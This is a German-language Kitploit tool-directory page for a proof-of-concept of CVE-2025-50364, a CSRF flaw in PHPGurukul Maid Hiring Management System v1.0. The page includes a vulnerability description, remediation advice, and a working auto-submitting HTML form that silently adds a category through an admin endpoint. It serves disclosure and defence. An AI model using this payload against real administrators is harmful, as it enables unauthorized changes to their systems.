Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE — Proof-of-Concept für eine CSRF-Schwachstelle in PHPGurukul Maid Hiring Management System v1.0, die die nicht autorisierte Erstellung von Kategorien durch manipulierte bösartige Anfragen demonstriert. | Kitploit
Tools/GitHubGitHub/1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHub1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve

CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE

Proof-of-Concept für eine CSRF-Schwachstelle in PHPGurukul Maid Hiring Management System v1.0, die die nicht autorisierte Erstellung von Kategorien durch manipulierte bösartige Anfragen demonstriert.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 1 JahrNoch nicht geprüft

Projektname & Repo-URL: Maid Hiring Management System using PHP and MySQL

Schwachstellentyp: Client-Seitige Request-Fälschung

Betroffene Version(en): v1.0

💣Beschreibung der Schwachstelle: Eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) existiert im Admin-Panel des PHPGurukul Hiring Management Systems, die es einem Angreifer ermöglicht, beliebige Einstellungskategorien hinzuzufügen, indem ein authentifizierter Administrator dazu gebracht wird, eine bösartige Website zu besuchen. Dies kann zu Datenverschmutzung und unbefugten Änderungen auf Administratorebene führen.

👩‍💻Auswirkungen: Unbefugte Kategorieerstellung

🛜Proof-of-Concept (PoC)

  1. Es gab eine Kategoriehinzufügefunktion, bei der nur authentifizierte Administratoren eine Kategorie hinzufügen konnten. 1 2)HTML-Code, um eine POST-Anfrage an den Endpunkt /admin/add-category.php zu senden CSRF-POC 2
root@kitploit:~
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
      <input type="hidden" name="catname" value="CSRF&#45;POC" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. Verwenden Sie den HTML-Code und erstellen Sie eine bösartige URL. 3
  2. Nachdem der Administrator auf den Link klickt, wird eine neue Kategorie hinzugefügt. 4 5

Empfehlung: Implementierung von CSRF-Tokens in Admin-Formularen, Durchsetzung von SameSite-Cookies und Validierung des Anfrageursprungs, um unbefugte Aktionen zu verhindern.

Tool herunterladen